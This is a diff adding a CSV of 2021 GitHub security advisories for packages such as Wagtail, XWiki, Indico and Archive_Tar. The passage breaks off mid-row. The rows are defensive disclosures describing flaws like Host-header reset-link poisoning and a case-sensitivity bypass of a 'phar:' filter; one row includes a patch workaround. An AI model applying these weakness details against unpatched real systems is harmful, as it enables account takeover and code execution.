diff --git "a/github-advisory-2021.csv" "b/github-advisory-2021.csv"
new file mode 100644--- /dev/null
+++ "b/github-advisory-2021.csv"
@@ -0,0 +1,25951 @@
+schema_version,id,modified,published,withdrawn,aliases,summary,details,severity,affected,references,database_specific
+1.4.0,GHSA-76f4-fw33-6j2v,2021-10-08T21:23:41Z,2021-04-19T14:48:26Z,,[],Potential sensitive data exposure in applications using Vaadin 15,"Insecure configuration of default `ObjectMapper` in `com.vaadin:flow-server` versions 3.0.0 through 3.0.5 (Vaadin 15.0.0 through 15.0.4) may expose sensitive data if the application also uses e.g. `@RestController`
+
+- https://vaadin.com/security/cve-2020-36319","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '15.0.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-76f4-fw33-6j2v'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/platform'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2020-36319'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:14:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w3hj-wr2q-x83g,2021-03-30T17:04:34Z,2021-04-06T17:22:17Z,,[],Discovery uses the same AES/GCM Nonce throughout the session,"Discovery uses the same AES/GCM Nonce throughout the session though it should be generated on per message basis which can lead to the leaking of the session key. As the actual ENR record is signed with a different key it is not possible for an attacker to alter the ENR record. Note that the node private key is not compromised, only the session key generated to communicate with an individual peer.
+
+From [discovery spec](https://github.com/ethereum/devp2p/blob/f97b8a5b8e9589d3355ebbd9d4a58d5d1644bdf7/discv5/discv5-theory.md#session-cache):
+> The number of messages which can be encrypted with a certain session key is limited because encryption of each message requires a unique nonce for AES-GCM. In addition to the keys, the session cache must also keep track of the count of outgoing messages to ensure the uniqueness of nonce values. Since the wire protocol uses 96 bit AES-GCM nonces, it is strongly recommended to generate them by encoding the current outgoing message count into the first 32 bits of the nonce and filling the remaining 64 bits with random data generated by a cryptographically secure random number generator.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'tech.pegasys.discovery:discovery'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ConsenSys/discovery/security/advisories/GHSA-w3hj-wr2q-x83g'}]","{'cwe_ids': ['CWE-323'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T17:04:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hmw2-mvvh-jf5j,2021-04-08T22:25:20Z,2021-04-13T15:22:47Z,,['CVE-2019-10801'],OS Command Injection in enpeem,enpeem through 2.2.0 allows execution of arbitrary commands. The "options.dir" argument is provided to the "exec" function without any sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'enpeem'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10801'}, {'type': 'WEB', 'url': 'https://github.com/balderdashy/enpeem/blob/master/index.js#L114'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ENPEEM-559007'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T22:25:20Z', 'nvd_published_at': '2020-02-28T21:15:00Z'}"
+1.4.0,GHSA-5fjj-cfh2-ghc5,2021-04-06T22:34:40Z,2021-04-13T15:25:24Z,,['CVE-2020-8128'],Server-Side Request Forgery and Inclusion of Functionality from Untrusted Control Sphere in jsreport,An unintended require and server-side request forgery vulnerabilities in jsreport version 2.5.0 and earlier allow attackers to execute arbitrary code.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsreport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.5.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8128'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/660565'}]","{'cwe_ids': ['CWE-829', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T22:34:40Z', 'nvd_published_at': '2020-02-14T22:15:00Z'}"
+1.4.0,GHSA-7xc5-ggpp-g249,2023-08-07T11:51:29Z,2021-04-20T16:13:24Z,,['CVE-2020-28468'],pwntools Server-Side Template Injection (SSTI) vulnerability,"This affects the package pwntools before 4.3.1. The shellcraft generator for affected versions of this module are vulnerable to Server-Side Template Injection (SSTI), which can lead to remote code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pwntools'}, 'ecosystem_specific': {'affected_functions': ['pwnlib.shellcraft.pretty', 'pwnlib.constants.ConstantsModule.eval']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28468'}, {'type': 'WEB', 'url': 'https://github.com/Gallopsled/pwntools/issues/1427'}, {'type': 'WEB', 'url': 'https://github.com/Gallopsled/pwntools/pull/1732'}, {'type': 'WEB', 'url': 'https://github.com/Gallopsled/pwntools/commit/138188eb1c027a2d0ffa4151511c407d3a001660'}, {'type': 'PACKAGE', 'url': 'https://github.com/Gallopsled/pwntools'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-PWNTOOLS-1047345'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:11:00Z', 'nvd_published_at': '2021-01-08T12:15:00Z'}"
+1.4.0,GHSA-3c67-gc48-983w,2023-08-31T20:35:31Z,2021-04-20T16:44:37Z,,['CVE-2020-10691'],Path Traversal in Ansible,"An archive traversal flaw was found in all ansible-engine versions 2.9.x prior to 2.9.7, when running `ansible-galaxy collection` install. When extracting a collection .tar.gz file, the directory is created without sanitizing the filename. An attacker could take advantage to overwrite any file within the system.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10691'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/68596'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/commit/b2551bb6943eec078066aa3a923e0bb3ed85abe8'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10691'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T14:22:26Z', 'nvd_published_at': '2020-04-30T17:15:00Z'}"
+1.4.0,GHSA-mmhj-4w6j-76h7,2021-03-30T22:27:45Z,2021-04-06T17:22:55Z,,['CVE-2021-21413'],Misuse of `Reference` and other transferable APIs may lead to access to nodejs isolate,"Versions of `isolated-vm` before v4.0.0, and especially before v3.0.0, have API pitfalls which may make it easy for implementers to expose supposed secure isolates to the permissions of the main nodejs isolate.
+
+`Reference` objects allow access to the underlying reference's full prototype chain. In an environment where the implementer has exposed a `Reference` instance to an attacker they would be able to use it to acquire a `Reference` to the nodejs context's `Function` object.
+
+Similar application-specific attacks could be possible by modifying the local prototype of other API objects.
+
+Access to `NativeModule` objects could allow an attacker to load and run native code from anywhere on the filesystem. If combined with, for example, a file upload API this would allow for arbitrary code execution.
+
+To address these issues the following changes were made in v4.0.0:
+- Documentation was updated with more explicit guidelines on building secure applications.
+- `Reference` instances will no longer follow prototype chains by default, nor will they invoke accessors or proxies.
+- All `isolated-vm` API prototypes are now immutable.
+- `NativeModule` constructor may only be invoked from a nodejs isolate.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'isolated-vm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/laverdet/isolated-vm/security/advisories/GHSA-mmhj-4w6j-76h7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21413'}, {'type': 'WEB', 'url': 'https://github.com/laverdet/isolated-vm/commit/2646e6c1558bac66285daeab54c7d490ed332b15'}, {'type': 'WEB', 'url': 'https://github.com/laverdet/isolated-vm/commit/27151bfecc260e96714443613880e3b2e6596704'}, {'type': 'WEB', 'url': 'https://github.com/laverdet/isolated-vm/blob/main/CHANGELOG.md#v400'}]","{'cwe_ids': ['CWE-913'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T22:27:45Z', 'nvd_published_at': '2021-03-30T23:15:00Z'}"
+1.4.0,GHSA-2xpj-f5g2-8p7m,2023-08-30T21:16:22Z,2021-04-20T16:30:51Z,,['CVE-2020-17446'],Asyncpg Arbitrary Code Execution Via Access to an Uninitialized Pointer,"asyncpg before 0.21.0 allows a malicious PostgreSQL server to trigger a crash or execute arbitrary code (on a database client) via a crafted server response, because of access to an uninitialized pointer in the array data decoder.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'asyncpg'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17446'}, {'type': 'WEB', 'url': 'https://github.com/MagicStack/asyncpg/commit/69bcdf5bf7696b98ee708be5408fd7d854e910d0'}, {'type': 'WEB', 'url': 'https://github.com/MagicStack/asyncpg/releases/tag/v0.21.0'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00002.html'}]","{'cwe_ids': ['CWE-824'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-14T21:35:20Z', 'nvd_published_at': '2020-08-12T16:15:00Z'}"
+1.4.0,GHSA-rvcw-f68w-8h8h,2023-03-17T17:49:57Z,2021-04-19T15:00:05Z,,['CVE-2021-29446'],Padding Oracle Attack due to Observable Timing Discrepancy in jose-node-cjs-runtime,"### Impact
+
+[AES_CBC_HMAC_SHA2 Algorithm](https://tools.ietf.org/html/rfc7518#section-5.2) (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDecryptionFailed` would be thrown. But a possibly observable difference in timing when padding error would occur while decrypting the ciphertext makes a padding oracle and an adversary might be able to make use of that oracle to decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block).
+
+### Patches
+
+A patch was released which ensures the HMAC tag is verified before performing CBC decryption. The fixed versions are `>=3.11.4`.
+
+Users should upgrade to `^3.11.4`.
+
+### Credits
+Thanks to Morgan Brown of Microsoft for bringing this up and Eva Sarafianou (@esarafianou) for helping to score this advisory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jose-node-cjs-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/panva/jose/security/advisories/GHSA-rvcw-f68w-8h8h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29446'}, {'type': 'PACKAGE', 'url': 'https://github.com/panva/jose'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/jose-node-cjs-runtime'}]","{'cwe_ids': ['CWE-203', 'CWE-208', 'CWE-696'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T22:57:33Z', 'nvd_published_at': '2021-04-16T22:15:00Z'}"
+1.4.0,GHSA-3pcr-4982-548m,2021-04-12T22:33:05Z,2021-04-13T15:13:37Z,,[],Exposure of .env if project root is configured as web root in shopware/production,"### Impact
+
+The .env and other sensitive files can be leaked if the project root and not `/public` is configured as the web root.
+
+### Patches
+We recommend to update to the current version 6.3.5.3. You can get the update to 6.3.5.3 regularly via the Auto-Updater or directly via the download overview.
+
+https://www.shopware.com/en/download/#shopware-6
+
+### Workarounds
+
+You should always use `/public` as the web root.
+
+For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
+
+https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
+
+### For more information
+https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-04-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/production'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-3pcr-4982-548m'}]","{'cwe_ids': ['CWE-552'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T22:33:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-67mq-h2r9-rh2m,2022-12-03T03:51:28Z,2021-04-13T15:23:41Z,,['CVE-2020-28460'],Prototype pollution in multi-ini,This affects the package multi-ini before 2.1.2. It is possible to pollute an object's prototype by specifying the constructor.proto object as part of an array. This is a bypass of CVE-2020-28448.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'multi-ini'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28460'}, {'type': 'WEB', 'url': 'https://github.com/evangelion1204/multi-ini/commit/6b2212b2ce152c19538a2431415f72942c5a1bde'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MULTIINI-1053229'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T23:23:09Z', 'nvd_published_at': '2020-12-22T13:15:00Z'}"
+1.4.0,GHSA-6g3c-2mh5-7q6x,2023-09-25T16:03:47Z,2021-04-19T14:56:33Z,,['CVE-2021-29451'],Missing validation of JWT signature in `ManyDesigns/Portofino`,"### Impact
+[Portofino](https://github.com/ManyDesigns/Portofino) is an open source web development framework. Portofino before version 5.2.1 did not properly verify the signature of JSON Web Tokens.
+This allows forging a valid JWT.
+
+### Patches
+The issue will be patched in the upcoming 5.2.1 release.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [https://github.com/ManyDesigns/Portofino](https://github.com/ManyDesigns/Portofino)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.manydesigns:portofino-dispatcher'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.manydesigns:portofino-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ManyDesigns/Portofino/security/advisories/GHSA-6g3c-2mh5-7q6x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29451'}, {'type': 'WEB', 'url': 'https://github.com/ManyDesigns/Portofino/commit/8c754a0ad234555e813dcbf9e57d637f9f23d8fb'}, {'type': 'WEB', 'url': 'https://mvnrepository.com/artifact/com.manydesigns/portofino'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T22:57:13Z', 'nvd_published_at': '2021-04-16T22:15:00Z'}"
+1.4.0,GHSA-vp77-fqqp-79j8,2021-03-22T22:39:06Z,2021-04-13T15:20:27Z,,['CVE-2020-28449'],Prototype Pollution in decal,This affects all versions of package decal. The vulnerability is in the set function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'decal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28449'}, {'type': 'WEB', 'url': 'https://github.com/gigafied/decal.js/blob/master/src/utils/set.js%23L45-L73'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DECAL-1051007'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/decal'}]","{'cwe_ids': ['CWE-1321', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:39:06Z', 'nvd_published_at': '2021-02-04T15:15:00Z'}"
+1.4.0,GHSA-wq5h-f9p5-q7fx,2023-04-21T15:24:43Z,2021-04-20T14:02:30Z,,['CVE-2021-29434'],Improper validation of URLs ('Cross-site Scripting') in Wagtail rich text fields,"### Impact
+When saving the contents of a rich text field in the admin interface, Wagtail does not apply server-side checks to ensure that link URLs use a valid protocol. A malicious user with access to the admin interface could thus craft a POST request to publish content with `javascript:` URLs containing arbitrary code. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin.
+
+### Patches
+Patched versions have been released as Wagtail 2.11.7 (for the LTS 2.11 branch) and Wagtail 2.12.4 (for the current 2.12 branch).
+
+### Workarounds
+For sites that cannot easily upgrade to a current supported version, the vulnerability can be patched by adding the following code to a `wagtail_hooks.py` module in any installed app:
+
+```python
+from draftjs_exporter.dom import DOM
+from wagtail.admin.rich_text.converters.html_to_contentstate import ExternalLinkElementHandler, PageLinkElementHandler
+from wagtail.core import hooks
+from wagtail.core.whitelist import check_url
+
+
+def link_entity(props):
+ id_ = props.get('id')
+ link_props = {}
+
+ if id_ is not None:
+ link_props['linktype'] = 'page'
+ link_props['id'] = id_
+ else:
+ link_props['href'] = check_url(props.get('url'))
+
+ return DOM.create_element('a', link_props, props['children'])
+
+
+@hooks.register('register_rich_text_features', order=1)
+def register_link(features):
+ features.register_converter_rule('contentstate', 'link', {
+ 'from_database_format': {
+ 'a[href]': ExternalLinkElementHandler('LINK'),
+ 'a[linktype=""page""]': PageLinkElementHandler('LINK'),
+ },
+ 'to_database_format': {
+ 'entity_decorators': {'LINK': link_entity}
+ }
+ })
+```
+
+### Acknowledgements
+Many thanks to Kevin Breen for reporting this issue.
+
+### For more information
+If you have any questions or comments about this advisory:
+
+* Visit Wagtail's [support channels](https://docs.wagtail.io/en/stable/support.html)
+* Email us at security@wagtail.io (if you wish to send encrypted email, the public key ID is `0x6ba1e1a86e0f8ce8`)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'wagtail'}, 'ecosystem_specific': {'affected_functions': ['wagtail.admin.rich_text.converters.contentstate.link_entity']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.11.6'}}, {'package': {'ecosystem': 'PyPI', 'name': 'wagtail'}, 'ecosystem_specific': {'affected_functions': ['wagtail.admin.rich_text.converters.contentstate.link_entity']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.12'}, {'fixed': '2.12.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.12.3'}}]","[{'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/security/advisories/GHSA-wq5h-f9p5-q7fx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29434'}, {'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/commit/5c7a60977cba478f6a35390ba98cffc2bd41c8a4'}, {'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/commit/915f6ed2bd7d53154103cc4424a0f18695cdad6c'}, {'type': 'PACKAGE', 'url': 'https://github.com/wagtail/wagtail'}, {'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/compare/v2.11.6...v2.11.7'}, {'type': 'WEB', 'url': 'https://pypi.org/project/wagtail/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T18:46:26Z', 'nvd_published_at': '2021-04-19T19:15:00Z'}"
+1.4.0,GHSA-jh5x-hfhg-78jq,2023-07-05T23:21:42Z,2021-04-22T16:20:50Z,,['CVE-2020-28948'],Deserialization of Untrusted Data in Archive_Tar,Archive_Tar through 1.4.10 allows an unserialization attack because `phar:` is blocked but `PHAR:` is not blocked. See: https://github.com/pear/Archive_Tar/issues/33,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pear/archive_tar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28948'}, {'type': 'WEB', 'url': 'https://github.com/pear/Archive_Tar/issues/33'}, {'type': 'WEB', 'url': 'https://github.com/pear/Archive_Tar/commit/0670a05fdab997036a3fc3ef113b8f5922e574da'}, {'type': 'PACKAGE', 'url': 'https://github.com/pear/Archive_Tar'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/11/msg00045.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42GPGVVFTLJYAKRI75IVB5R45NYQGEUR/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4V35LBRM6HBCXBVCITKQ4UEBTXO2EG7B/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5KSFM672XW3X6BR7TVKRD63SLZGKK437/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KWM4CTMEGAC4I2CHYNJVSROY4CVXVEUT/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NBYZSHYTIOBK6V7C4N7TP6KIKCRKLVWP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VJQQYDAOWHD6RDITDRPHFW7WY6BS3V5N/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202101-23'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4817'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2020-013'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T00:18:26Z', 'nvd_published_at': '2020-11-19T19:15:00Z'}"
+1.4.0,GHSA-cwg9-c9cr-p5fq,2021-03-26T23:20:56Z,2021-04-13T15:18:53Z,,['CVE-2021-28161'],Improper Neutralization of Input in Theia console,"In Eclipse Theia versions up to and including 1.8.0, in the debug console there is no HTML escaping, so arbitrary Javascript code can be injected.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@theia/console'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28161'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/issues/8794'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T23:20:56Z', 'nvd_published_at': '2021-03-12T22:15:00Z'}"
+1.4.0,GHSA-5c66-v29h-xjh8,2021-04-20T18:36:33Z,2021-04-22T16:11:55Z,,['CVE-2021-29459'],XSS Cross Site Scripting,"### Impact
+It is possible to persistently inject scripts in XWiki.
+
+For unregistred users:
+- By filling simple text fields
+
+For registered users:
+- By filling their personal information
+- (if they have edit rights) By filling the values of static lists using App Within Minutes
+
+That can lead to user's session hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other security vulnerabilities.
+That can also lead to the attacker taking over an account.
+If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account.
+### Patches
+It has been patched on XWiki 12.8 and 12.6.3.
+
+### Workarounds
+There is no easy workaround except upgrading XWiki.
+
+### References
+https://jira.xwiki.org/browse/XWIKI-17374
+
+### For more information
+If you have any questions or comments about this advisory:
+ * Open an issue in [Jira XWiki](https://jira.xwiki.org)
+ * Email us at our [security mailing list](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.6.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.6.4'}, {'fixed': '12.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.6.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.6.4'}, {'fixed': '12.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5c66-v29h-xjh8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29459'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T18:36:33Z', 'nvd_published_at': '2021-04-20T19:15:00Z'}"
+1.4.0,GHSA-wgpj-7c2j-vfjm,2023-09-05T14:29:48Z,2021-04-08T16:33:38Z,,['CVE-2021-30185'],Indico Tampering with links (e.g. password reset) in sent emails,"### Impact
+An external audit of the Indico codebase has discovered a vulnerability in Indico's URL generation logic which could have allowed an attacker to make Indico send a password reset link with a valid token pointing to an attacker-controlled domain by sending that domain in the `Host` header. Had a user clicked such a link without realizing it does not point to Indico (and that they never requested it), it would have revealed their password reset token to the attacker, allowing them to reset the password for that user and thus take over their Indico account.
+
+- If the web server already enforces a canonical host name, this cannot be exploited (this was not part of the default config from the Indico setup guide)
+- If only SSO is used ([`LOCAL_IDENTITIES`](https://docs.getindico.io/en/stable/config/settings/#LOCAL_IDENTITIES) set to `False`), the vulnerability cannot be exploited for password reset links, but other links in emails set by Indico could be tampered with in the same way (with less problematic impact though)
+
+### Patches
+You need to update to [Indico 2.3.4](https://github.com/indico/indico/releases/tag/v2.3.4) as soon as possible.
+See [the docs](https://docs.getindico.io/en/stable/installation/upgrade/) for instructions on how to update.
+
+### Workarounds
+You can configure the web server to canonicalize the URL to the hostname used for Indico. See [this commit](https://github.com/indico/indico/pull/4815/commits/b6bff6d004abcf07db1891e26a0eb4aa0edb7c21) for the changes in our setup docs; they can be easily applied to your existing web server config.
+
+### For more information
+If you have any questions or comments about this advisory:
+
+- Open a thread in [our forum](https://talk.getindico.io/)
